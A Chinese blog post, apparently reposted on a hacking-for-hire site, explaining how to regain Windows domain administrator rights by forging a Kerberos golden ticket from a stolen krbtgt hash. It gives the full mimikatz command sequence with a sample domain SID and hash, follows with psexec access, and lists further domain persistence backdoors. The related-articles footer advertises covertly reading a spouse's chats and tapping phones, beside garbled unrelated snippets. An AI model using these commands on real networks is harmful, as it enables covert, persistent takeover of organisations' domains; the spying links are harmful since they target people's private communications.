渗透技术|域渗透的金之钥匙

hacker4年前关于黑客接单383

  最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。

  我原来发过一个微博说

  

  这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

  要重新拿回域管理员权限,首先要先知道域内的管理员有谁

  我这里的实验环境,通过截图可以看到域管理员是administrator

  我还要知道域SID是啥

  我的域SID是

  还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

  krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

  

  然后该用神器mimikatz出场了,依次执行

  mimikatz # kerberos::purge

  mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

  mimikatz # kerberos::ptt Administrator.kiribi

  mimikatz # kerberos::tgt

  

  到现在,我们又重新拥有域管理员权限了,可以验证下

  E:\>net use \\WIN-0DKN2AS0T2G\c$

  E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

  

  呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

  当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

  【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】

标签: 渗透测试

相关文章

怎么偷偷的查看我老公的微信聊天记录 如何监控

】12月14日消息,《华尔街日报》报道称,波音公司一台存储了38.2万员工记录的笔记本电脑被窃贼偷走。此外,这台笔记本电脑中还有波音公司退休员工的个人数据。 据theinquirer.net网站报道...

谢娜元宵节晒怼脸照状态好 剪短发疑为生产做准

谢娜 26日晚,谢娜分享了一张自拍美照,还发文祝大家米宵节快乐:“修修头发,打扮打扮,大家米宵节快乐哟”。 这还是谢娜在官宣怀二胎后首晒近照,照片中,谢娜不仅修...

这4大优秀90后创业者,你想成为哪一位?

互联网技术惊涛骇浪的袭来,让很多九零后凭着自身懂网的优点,造就了一个又一个盛行互联网技术的手机软件。她们造就的手机软件,你一定有一定的了解,而这种以前令你艳羡的90后创业者现如今又将出路在哪里呢?...

怎么样才能监听别人的手机通话

. 听着每天早上呼呼大风的声音,越发感觉天气的寒冷,上班的人群也越来越慵懒,不想上班的念头也是越来越深,想必天冷不上班是很多人心中的想法,下面友谊长存小编就带来天冷不想上班的心情说说,天冷不想上班的...

C语言黑客编程6(黑客 编程语言)

C语言黑客编程6(黑客 编程语言)

本文目录一览: 1、C语言编程6 2、黑客c语言 3、c语言黑客编程 C语言编程6 姐姐,一、这里*even+=a[i];else*odd+=a[i];注意,是带了*号的,带了*的话就是指向...

为什么老公这么好赌吧,天天都要赌钱还找个赌友当

从理论上讲,远程桌面服务本身并不容易受到攻击,但一旦被攻击,其后果可是不堪设想的。 如果你还不知道该漏洞的威力,就请想一想2017年5月爆发的WannaCry(又叫Wanna Decryptor)。...